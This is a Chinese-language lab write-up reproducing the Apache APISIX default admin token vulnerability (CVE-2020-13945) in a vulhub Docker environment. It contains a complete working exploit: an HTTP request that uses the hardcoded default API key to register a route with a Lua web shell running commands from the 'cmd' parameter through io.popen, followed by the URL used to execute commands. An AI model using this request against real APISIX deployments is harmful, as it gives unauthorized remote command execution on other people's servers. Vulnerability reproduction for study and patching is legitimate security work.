Apache APISIX 默認密鑰漏洞(CVE-2020-13945)復現
一、 實驗所需環境
1、Ubuntu
2、vulhub
3、apisix/CVE-2020-13945
二、 漏洞介紹
Apache APISIX是一個高性能API網關,在用戶未指定管理員Token或使用了默認組態檔的情況下,Apache APISIX將使用默認的管理員Token edd1c9f034335f136f87ad84b625c8f1,攻擊者利用這個Token可以訪問到管理員介面,進而通過script引數來插入任意LUA腳本并執行,
三、 漏洞復現
(1)進入vulhub,選擇apisix/CVE-2020-13945漏洞環境,
輸入命令啟動:docker-compose up -d
(2)環境啟動成功后,訪問http://your-ip:9080即可查看到默認的404頁面,
(3)使用Burp Suite抓包,利用默認Token增加一個惡意的router,
其中包含惡意LUA腳本:
POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
(4)然后,我們訪問剛才添加的router,就可以通過cmd引數執行任意命令:http://your-ip:9080/attack?cmd=id
參考鏈接:
- https://github.com/vulhub/vulhub/blob/master/apisix/CVE-2020-13945
- https://apisix.apache.org/docs/apisix/getting-started
- https://github.com/apache/apisix/pull/2244
- https://seclists.org/oss-sec/2020/q4/187
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/498784.html
標籤:訊息安全